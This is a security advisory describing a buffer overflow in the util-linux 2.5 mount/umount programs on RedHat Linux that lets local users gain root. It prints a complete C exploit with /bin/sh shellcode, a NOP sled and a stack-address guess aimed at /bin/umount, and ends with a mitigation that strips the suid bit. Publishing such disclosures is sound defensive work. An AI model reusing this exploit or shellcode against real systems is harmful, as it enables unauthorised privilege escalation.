COMMAND

    mount-umount

SYSTEMS AFFECTED

    RedHat Linux

PROBLEM

    A  vulnerability  exists  in  the  mount/umount  programs  of  the
    util-linux 2.5 package. If installed suid-to-root, these  programs
    allow local users to gain super-user privileges.  Local users  can
    gain   root   privileges.   The   exploits   that   exercise  this
    vulnerability were made available.

    mount/umount utilities  from the  util-linux 2.5  suffer from  the
    buffer overrun  problem. Installing  mount/umount as  suid-to-root
    programs is necessary  to allow local  users to mount  and unmount
    removable  media  without  having  super-user  privileges. If this
    feature  is  not  required,  it  is  recommended  that suid bit is
    removed from both  mount and umount  programs. If this  feature is
    required,  one  might   want  to  consider   the  other  ways   of
    implementing it. Such  approaches include but  are not limited  to
    using auto-mounter or  sudo mechanism.   Exploit that follows  was
    discovered and coded by Bloodmask & Vio.

-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i<strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i<(8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}

SOLUTION

    Get upgarde or  in order to  prevent the vulnerability  from being
    exploited in the  mean time, it  is recommended that  the suid bit
    is removed from mount and umount programs using command:

        chmod u-s /bin/mount /bin/umount